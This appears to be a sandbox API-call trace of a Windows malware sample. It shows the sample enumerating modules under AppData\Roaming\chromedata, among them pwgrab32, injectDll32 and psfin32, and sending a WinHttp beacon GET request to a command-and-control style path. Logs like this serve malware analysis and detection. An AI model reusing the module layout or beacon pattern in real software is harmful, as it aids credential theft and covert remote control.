	[0234.675] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\sinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\sinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6d0
	[0234.675] GetFileTime (in: hFile=0x6d0, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0234.675] CloseHandle (hObject=0x6d0) returned 1
	[0234.675] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x73b85100, dwHighDateTime=0x1d50a6a)) 
	[0234.675] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6d0
	[0234.676] GetFileTime (in: hFile=0x6d0, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5cee06e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0234.676] CloseHandle (hObject=0x6d0) returned 1
	[0234.676] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x73b85100, dwHighDateTime=0x1d50a6a)) 
	[0234.676] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0234.676] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6d0
	[0234.676] GetFileTime (in: hFile=0x6d0, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6052dcc0, dwHighDateTime=0x1d50a6a)) returned 1
	[0234.676] CloseHandle (hObject=0x6d0) returned 1
	[0234.676] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x73b85100, dwHighDateTime=0x1d50a6a)) 
	[0234.676] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0234.676] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6d0
	[0234.676] GetFileTime (in: hFile=0x6d0, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a)) returned 1
	[0234.676] CloseHandle (hObject=0x6d0) returned 1
	[0234.676] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x73b85100, dwHighDateTime=0x1d50a6a)) 
	[0234.676] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0234.676] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6d0
	[0234.677] GetFileTime (in: hFile=0x6d0, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a)) returned 1
	[0234.677] CloseHandle (hObject=0x6d0) returned 1
	[0234.677] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x73b85100, dwHighDateTime=0x1d50a6a)) 
	[0234.677] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0234.677] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x129128, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0234.677] PathAddBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\") returned=""
	[0234.677] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\*.*", lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x70fa1b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x70fa1b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x22b7040
	[0234.677] FindNextFileW (in: hFindFile=0x22b7040, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x70fa1b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x70fa1b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0234.677] FindNextFileW (in: hFindFile=0x22b7040, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5992b680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5992b680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x599517e0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x90bc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32", cAlternateFileName="INJECT~1")) returned 1
	[0234.677] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad378
	[0234.677] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x27da970
	[0234.677] FindNextFileW (in: hFindFile=0x22b7040, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5b9e6500, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5ceba580, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ceba580, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32_configs", cAlternateFileName="INJECT~2")) returned 1
	[0234.677] FindNextFileW (in: hFindFile=0x22b7040, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68a088a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x68a088a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x68a088a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x4ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32", cAlternateFileName="NETWOR~1")) returned 1
	[0234.677] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad378, Size=0x10) returned 0x22ad468
	[0234.677] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x27dab88
	[0234.677] FindNextFileW (in: hFindFile=0x22b7040, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x69f02a80, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x69f02a80, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x69f02a80, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32_configs", cAlternateFileName="NETWOR~2")) returned 1
	[0234.677] FindNextFileW (in: hFindFile=0x22b7040, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6e5ad7a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6e5ad7a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6e5d3900, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x48b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32", cAlternateFileName="")) returned 1
	[0234.677] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad468, Size=0x10) returned 0x22ad378
	[0234.677] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x27dada0
	[0234.677] FindNextFileW (in: hFindFile=0x22b7040, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6eff1680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6eff1680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6eff1680, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32_configs", cAlternateFileName="PSFIN3~1")) returned 1
	[0234.677] FindNextFileW (in: hFindFile=0x22b7040, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5edac380, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5edac380, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ee1e7a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x111360, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32", cAlternateFileName="")) returned 1
	[0234.677] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad378, Size=0x10) returned 0x22ad468
	[0234.677] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x27dafb8
	[0234.679] FindNextFileW (in: hFindFile=0x22b7040, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x60507b60, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x60507b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x60507b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32_configs", cAlternateFileName="PWGRAB~1")) returned 1
	[0234.679] FindNextFileW (in: hFindFile=0x22b7040, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70f7ba00, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x70f7ba00, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x70fa1b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x28e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="shareDll32", cAlternateFileName="SHARED~1")) returned 1
	[0234.679] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad468, Size=0x20) returned 0x27bf900
	[0234.679] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x27db1d0
	[0234.679] FindNextFileW (in: hFindFile=0x22b7040, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 1
	[0234.679] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27bf900, Size=0x20) returned 0x27bf928
	[0234.679] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x27db3e8
	[0234.679] FindNextFileW (in: hFindFile=0x22b7040, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 0
	[0234.680] GetLastError () returned 0x12
	[0234.680] FindClose (in: hFindFile=0x22b7040 | out: hFindFile=0x22b7040) returned 1
	[0234.680] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32") returned="injectDll32"
	[0234.680] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x27db600
	[0234.680] GetFullPathNameW (in: lpFileName="Data\\injectDll32", nBufferLength=0x105, lpBuffer=0x27db600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32", lpFilePart=0x0) returned 0x41
	[0234.680] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6d0
	[0234.680] GetFileTime (in: hFile=0x6d0, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x599517e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0234.680] CloseHandle (hObject=0x6d0) returned 1
	[0234.680] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x73b85100, dwHighDateTime=0x1d50a6a)) 
	[0234.680] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27db600) returned 1
	[0234.681] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32") returned="networkDll32"
	[0234.681] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x27db600
	[0234.681] GetFullPathNameW (in: lpFileName="Data\\networkDll32", nBufferLength=0x105, lpBuffer=0x27db600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32", lpFilePart=0x0) returned 0x42
	[0234.681] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6d0
	[0234.681] GetFileTime (in: hFile=0x6d0, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0234.681] CloseHandle (hObject=0x6d0) returned 1
	[0234.681] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x73b85100, dwHighDateTime=0x1d50a6a)) 
	[0234.681] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27db600) returned 1
	[0234.681] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32") returned="psfin32"
	[0234.681] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x27db600
	[0234.681] GetFullPathNameW (in: lpFileName="Data\\psfin32", nBufferLength=0x105, lpBuffer=0x27db600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32", lpFilePart=0x0) returned 0x3d
	[0234.681] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6d0
	[0234.681] GetFileTime (in: hFile=0x6d0, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x6e5d3900, dwHighDateTime=0x1d50a6a)) returned 1
	[0234.681] CloseHandle (hObject=0x6d0) returned 1
	[0234.681] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x73b85100, dwHighDateTime=0x1d50a6a)) 
	[0234.682] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32") returned="pwgrab32"
	[0234.682] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x27db600
	[0234.682] GetFullPathNameW (in: lpFileName="Data\\pwgrab32", nBufferLength=0x105, lpBuffer=0x27db600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32", lpFilePart=0x0) returned 0x3e
	[0234.682] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6d0
	[0234.682] GetFileTime (in: hFile=0x6d0, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x5ee1e7a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0234.682] CloseHandle (hObject=0x6d0) returned 1
	[0234.682] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x73b85100, dwHighDateTime=0x1d50a6a)) 
	[0234.682] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32") returned="shareDll32"
	[0234.682] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x27db600
	[0234.682] GetFullPathNameW (in: lpFileName="Data\\shareDll32", nBufferLength=0x105, lpBuffer=0x27db600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32", lpFilePart=0x0) returned 0x40
	[0234.682] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\sharedll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6d0
	[0234.682] GetFileTime (in: hFile=0x6d0, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x70fa1b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0234.682] CloseHandle (hObject=0x6d0) returned 1
	[0234.682] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x73b85100, dwHighDateTime=0x1d50a6a)) 
	[0234.682] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32") returned="systeminfo32"
	[0234.682] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x27db600
	[0234.682] GetFullPathNameW (in: lpFileName="Data\\systeminfo32", nBufferLength=0x105, lpBuffer=0x27db600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32", lpFilePart=0x0) returned 0x42
	[0234.683] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\systeminfo32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6d0
	[0234.683] GetFileTime (in: hFile=0x6d0, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x46215b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0234.683] CloseHandle (hObject=0x6d0) returned 1
	[0234.683] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x73b85100, dwHighDateTime=0x1d50a6a)) 
	[0234.683] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0234.683] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0234.683] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1/ZwHatEaxHZs8OgxF/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0234.683] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128bf0, dwBufferLength=0x4) returned 1
	[0234.683] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0235.309] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0235.309] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128be0, lpdwBufferLength=0x128bdc, lpdwIndex=0x0 | out: lpBuffer=0x128be0*, lpdwBufferLength=0x128bdc*=0x4, lpdwIndex=0x0) returned 1
	[0235.309] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x7b) returned 1
